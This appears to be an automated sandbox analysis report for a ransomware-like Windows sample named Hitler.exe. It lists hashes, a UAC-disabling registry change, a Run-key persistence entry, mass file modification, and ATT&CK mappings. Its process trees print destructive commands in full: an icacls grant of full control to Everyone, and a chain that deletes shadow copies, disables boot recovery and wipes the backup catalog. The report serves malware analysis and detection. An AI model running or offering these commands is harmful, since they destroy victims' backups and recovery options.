Analysis
-
max time kernel
11s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 12:38
Behavioral task
behavioral1
Sample
Hitler.exe
Resource
win7-20240903-en
windows7-x64
20 signatures
150 seconds
Behavioral task
behavioral2
Sample
Hitler.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
Hitler.exe
-
Size
3.4MB
-
MD5
e64dbe09fc1805177d9058a40807e128
-
SHA1
fc15f43be27987315c8bcf61ff392ff8ac3e394c
-
SHA256
9ae7d51b7c3e729d9fd0eb7b99811de3270e7b37931fff1f136efeb50d276a4c
-
SHA512
806a78516ac5f08852fb80b702f5bfb891bb874542609641cc83bca13330554f1e670bf1544189eed15fe43facbee6765651d2ce7a6971ef57473696bb3cdccd
-
SSDEEP
98304:h8srYwCbFbLFVeGoXSKUa+sRlKSZt646FVbCJUpQdAahhGvLlhkmyNe4y4WNMvs:hh0b5eGoC0PRB6JPk6
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Hitler.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies file permissions 1 TTPs 1 IoCs
pid Process 464 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Adolf Hitler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Hitler.exe" Hitler.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Hitler.exe -
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI Hitler.exe File created C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini Hitler.exe File created C:\Program Files\desktop.ini Hitler.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\×ÀÃæ±³¾°Í¼Æ¬.bmp" Hitler.exe -
resource yara_rule behavioral2/memory/1668-0-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-10657-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-10656-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-13302-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-22525-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-27110-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-31451-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-40590-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-45501-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-45874-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-46145-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-46296-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-46393-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-46420-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-46465-0x0000000000400000-0x000000000085A000-memory.dmp upx behavioral2/memory/1668-46872-0x0000000000400000-0x000000000085A000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\powerpnt.exe.manifest Hitler.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\j2pcsc.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\PresentationFramework.resources.dll Hitler.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fontconfig.bfc Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmmui.msi.16.en-us.xml Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ppd.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-pl.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_Subscription-ul-oob.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\csi.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.IO.FileSystem.Primitives.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODBC.DLL Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\mscordaccore.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\ReachFramework.resources.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005 Hitler.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt Hitler.exe File created C:\Program Files\Common Files\System\msadc\ja-JP\msaddsr.dll.mui Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ppd.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.ProviderShared.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] Hitler.exe File opened for modification C:\Program Files\CompleteFind.rm Hitler.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dynalink.md Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp4-ppd.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\CAPSULES.INF Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es\System.Windows.Forms.Design.resources.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\cacerts.pem Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\PHONE.XML Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru\System.Windows.Forms.Primitives.resources.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\PresentationFramework-SystemDrawing.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\System.Windows.Forms.Primitives.resources.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOADFPS.DLL Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Serialization.Xml.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\IEEE2006OfficeOnline.xsl Hitler.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sv-se.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\mscorlib.dll Hitler.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\vcruntime140_1.dll Hitler.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngdatatype.md Hitler.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_sv.properties Hitler.exe File created C:\Program Files\Microsoft Office\root\Client\C2R32.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-ppd.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-ul-phn.xrm-ms Hitler.exe File created C:\Program Files\Common Files\microsoft shared\ink\lt-LT\tipresx.dll.mui Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_MAKC2R-pl.xrm-ms Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\PresentationFramework.resources.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\PresentationCore.resources.dll Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\System.Windows.Controls.Ribbon.resources.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-oob.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_EN.LEX Hitler.exe File created C:\Program Files\Common Files\microsoft shared\ink\ja-JP\ShapeCollector.exe.mui Hitler.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libffi.md Hitler.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\jfxrt.jar Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-ul-oob.xrm-ms Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALNBI.TTF Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Keywords.HxK Hitler.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Xml.XPath.XDocument.dll Hitler.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\JAWTAccessBridge-64.dll Hitler.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Top Shadow.eftx Hitler.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\sRGB.pf Hitler.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\×ÀÃæ±³¾°Í¼Æ¬.bmp Hitler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hitler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe 1668 Hitler.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 1668 Hitler.exe Token: 33 3824 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3824 AUDIODG.EXE Token: SeIncreaseQuotaPrivilege 4316 WMIC.exe Token: SeSecurityPrivilege 4316 WMIC.exe Token: SeTakeOwnershipPrivilege 4316 WMIC.exe Token: SeLoadDriverPrivilege 4316 WMIC.exe Token: SeSystemProfilePrivilege 4316 WMIC.exe Token: SeSystemtimePrivilege 4316 WMIC.exe Token: SeProfSingleProcessPrivilege 4316 WMIC.exe Token: SeIncBasePriorityPrivilege 4316 WMIC.exe Token: SeCreatePagefilePrivilege 4316 WMIC.exe Token: SeBackupPrivilege 4316 WMIC.exe Token: SeRestorePrivilege 4316 WMIC.exe Token: SeShutdownPrivilege 4316 WMIC.exe Token: SeDebugPrivilege 4316 WMIC.exe Token: SeSystemEnvironmentPrivilege 4316 WMIC.exe Token: SeRemoteShutdownPrivilege 4316 WMIC.exe Token: SeUndockPrivilege 4316 WMIC.exe Token: SeManageVolumePrivilege 4316 WMIC.exe Token: 33 4316 WMIC.exe Token: 34 4316 WMIC.exe Token: 35 4316 WMIC.exe Token: 36 4316 WMIC.exe Token: SeIncreaseQuotaPrivilege 4316 WMIC.exe Token: SeSecurityPrivilege 4316 WMIC.exe Token: SeTakeOwnershipPrivilege 4316 WMIC.exe Token: SeLoadDriverPrivilege 4316 WMIC.exe Token: SeSystemProfilePrivilege 4316 WMIC.exe Token: SeSystemtimePrivilege 4316 WMIC.exe Token: SeProfSingleProcessPrivilege 4316 WMIC.exe Token: SeIncBasePriorityPrivilege 4316 WMIC.exe Token: SeCreatePagefilePrivilege 4316 WMIC.exe Token: SeBackupPrivilege 4316 WMIC.exe Token: SeRestorePrivilege 4316 WMIC.exe Token: SeShutdownPrivilege 4316 WMIC.exe Token: SeDebugPrivilege 4316 WMIC.exe Token: SeSystemEnvironmentPrivilege 4316 WMIC.exe Token: SeRemoteShutdownPrivilege 4316 WMIC.exe Token: SeUndockPrivilege 4316 WMIC.exe Token: SeManageVolumePrivilege 4316 WMIC.exe Token: 33 4316 WMIC.exe Token: 34 4316 WMIC.exe Token: 35 4316 WMIC.exe Token: 36 4316 WMIC.exe Token: SeBackupPrivilege 4624 vssvc.exe Token: SeRestorePrivilege 4624 vssvc.exe Token: SeAuditPrivilege 4624 vssvc.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1668 Hitler.exe 1668 Hitler.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1668 wrote to memory of 464 1668 Hitler.exe 83 PID 1668 wrote to memory of 464 1668 Hitler.exe 83 PID 1668 wrote to memory of 464 1668 Hitler.exe 83 PID 1668 wrote to memory of 5020 1668 Hitler.exe 84 PID 1668 wrote to memory of 5020 1668 Hitler.exe 84 PID 1668 wrote to memory of 5020 1668 Hitler.exe 84 PID 5020 wrote to memory of 4316 5020 cmd.exe 88 PID 5020 wrote to memory of 4316 5020 cmd.exe 88 PID 5020 wrote to memory of 4316 5020 cmd.exe 88 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Hitler.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Hitler.exe"C:\Users\Admin\AppData\Local\Temp\Hitler.exe"1⤵
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1668 -
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:464
-
-
C:\Windows\SysWOW64\cmd.execmd /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x320 0x3c81⤵
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4624
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
2.4MB
MD53903d19844a4e4dfb0cd919842b01ccd
SHA17a6a04552ef57a4e2e15df8190fa136acf232b99
SHA256c1b11091d66e6e89c0e190aef1bfd7c5d566bcb03fb90e1a5cb8e8462387ceb4
SHA51243c4cdd3b1de62a5906aa6ceaf98fd7b36be41df1576bf89121336d8d48913768e461053e4f1f099faf49877e3cf8ea68bfb7509a6e6e35b36cb8fd2f856058a